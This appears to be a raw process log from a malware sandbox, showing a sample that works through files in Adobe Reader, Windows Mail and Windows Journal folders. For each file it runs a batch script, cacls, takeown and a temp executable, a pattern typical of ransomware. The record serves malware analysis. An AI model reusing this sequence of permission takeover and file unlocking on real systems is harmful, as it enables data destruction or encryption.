C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:1412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:1908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵
- Modifies file permissions
PID:1236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:1168
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:1420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:932
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:964
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵
- Modifies file permissions
PID:1580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "brt.fca" -nobanner3⤵PID:1696
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "brt.fca" -nobanner4⤵PID:1864
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:300
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵
- Modifies file permissions
PID:1860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "can129.hsp" -nobanner3⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "can129.hsp" -nobanner4⤵PID:1468
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "usa37.hyp" -nobanner3⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "usa37.hyp" -nobanner4⤵PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵PID:1372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵PID:1864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵PID:1888
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵PID:468
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:1404
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:1344
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:944
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:380
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:524
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "directories.acrodata" -nobanner3⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "directories.acrodata" -nobanner4⤵PID:548
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:1412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵PID:1908
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "PDIALOG.exe" -nobanner3⤵PID:1772
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "PDIALOG.exe" -nobanner4⤵PID:900
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""2⤵PID:1376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Music.jtp" -nobanner3⤵PID:756
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Music.jtp" -nobanner4⤵PID:1864
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:1412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "WinMail.exe" -nobanner3⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "WinMail.exe" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C3⤵PID:524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Memo.jtp" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Memo.jtp" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:1892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "wab.exe" -nobanner3⤵PID:1420
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "wab.exe" -nobanner4⤵PID:1404
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:208
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:1372
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:1888
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:1260
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:1860
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:300
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵
- Modifies file permissions
PID:1404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:1984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵PID:1888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "end_review.gif" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "end_review.gif" -nobanner4⤵PID:1028
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵PID:1096
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C3⤵PID:1324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"3⤵PID:300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "pdf.gif" -nobanner3⤵PID:212
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "pdf.gif" -nobanner4⤵PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:1840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "review_shared.gif" -nobanner3⤵PID:928
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "review_shared.gif" -nobanner4⤵PID:1808
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵PID:380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C3⤵PID:1912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"3⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "tr.gif" -nobanner3⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "tr.gif" -nobanner4⤵PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:1580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Identity-H" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Identity-H" -nobanner4⤵PID:916
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:2016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:1128
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:296
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵PID:548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "zx______.pfm" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "zx______.pfm" -nobanner4⤵PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:1860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵
- Modifies file permissions
PID:1344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:916
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1416
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""2⤵PID:1840
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C3⤵PID:1528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"3⤵PID:900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "can.fca" -nobanner3⤵PID:1128
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "can.fca" -nobanner4⤵PID:1420
-
-
-
